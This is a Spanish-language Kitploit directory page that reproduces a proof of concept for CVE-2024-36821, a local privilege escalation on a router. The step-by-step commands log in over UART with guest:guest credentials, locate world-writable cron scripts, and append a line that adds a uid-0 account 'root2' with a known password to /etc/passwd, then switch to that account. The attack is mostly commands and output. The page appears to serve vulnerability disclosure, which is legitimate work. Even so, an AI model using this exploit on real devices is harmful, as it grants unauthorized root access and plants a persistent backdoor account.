Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-36821 — La referencia pública que contiene la información mínima requerida para la vulnerabilidad cubierta por CVE-2024-36821 | Kitploit
Herramientas/GitHubGitHub/ivanglinkin/cve-2024-36821
Seguridad de Sistemas EmbebidosEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad de Hardware e IoT
GitHubivanglinkin/cve-2024-36821

CVE-2024-36821

La referencia pública que contiene la información mínima requerida para la vulnerabilidad cubierta por CVE-2024-36821

Ver Repositorio
3hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-36821

La referencia pública que contiene la información mínima requerida para la vulnerabilidad cubierta por CVE-2024-36821

El video original con PoC lo puedes encontrar en el video -> https://www.youtube.com/watch?v=6vHno0ik7JY

El PoC:

  1. Conéctate al router mediante la conexión UART

  2. Usando las credenciales guest:guest, inicia sesión en el sistema

  3. Usando el comando find / -perm -777 -type f 2>/dev/null, encuentra archivos con permisos de lectura, escritura y ejecución:

    root@kitploit:~
    1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
    2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
    3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
    4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
    5. /tmp/cron/cron.everyminute/conntrack_collector.sh
    
    Screenshot 2024-06-10 at 20 00 50
  4. Verifica el propietario con el comando ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh

  5. Genera la contraseña con el comando openssl passwd Abracadabra

  6. Edita /tmp/cron/cron.everyminute/conntrack_collector.sh, añadiendo al final la nueva contraseña generada:

    root@kitploit:~
    echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
    
    Screenshot 2024-06-10 at 20 05 05
  7. Espera un minuto

  8. Cambia al usuario root2 con el siguiente comando

    root@kitploit:~
    / $ su root2
    Password: Abracadabra
    ~ #
    
Descargar herramienta